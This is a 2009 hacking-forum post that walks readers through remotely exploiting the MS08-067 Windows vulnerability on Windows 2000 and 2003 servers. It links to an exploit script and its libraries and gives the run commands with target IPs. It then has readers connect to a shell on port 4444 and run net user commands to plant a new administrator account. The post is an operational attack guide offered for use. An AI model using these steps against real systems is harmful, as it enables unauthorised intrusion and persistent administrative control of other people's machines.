Remotely Exploiting MS08-067 to achieve Administrative rights on 2k and 2k3

3 replies [Last post]

22 June, 2009 - 23:42

EverestX

Offline

SX Crew

Joined: 2009/05/15

Here's the link to Microsoft: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Creds to the author of the script! Chances are you wont find many systems with this not patched these days. While other MS OS's are affected by this vulnerability, this script doesn't apply to them.

The Shell Script: http://milw0rm.org/exploits/7132

You will also need to download and install the following

Impacket : http://oss.coresecurity.com/projects/impacket.html
PyCrypto : http://www.amk.ca/python/code/crypto.html

Once you have identified a target download the shell script and save it out as a exploit.sh file. Chmod the file for execution.

Usage:

./exploit *Target IP* *OS*

For *OS* use 1 for 2000 and 2 for 2003 server

Example

2000 server

./exploit 192.168.0.100 1

2003 server

./exploit 192.168.0.100 2

Once the Exploit is successfull, telnet to port 4444 on your target, this will place you in a windows shell.

Add your administative user!

net user /add *user* *password*

net localgroup administrators *user* /add

You now have root.

EvX

SOLDIERX.COM Nobody Can Stop Information Insemination

User login

Navigation

Active forum topics

Who's online

Who's new

Remotely Exploiting MS08-067 to achieve Administrative rights on 2k and 2k3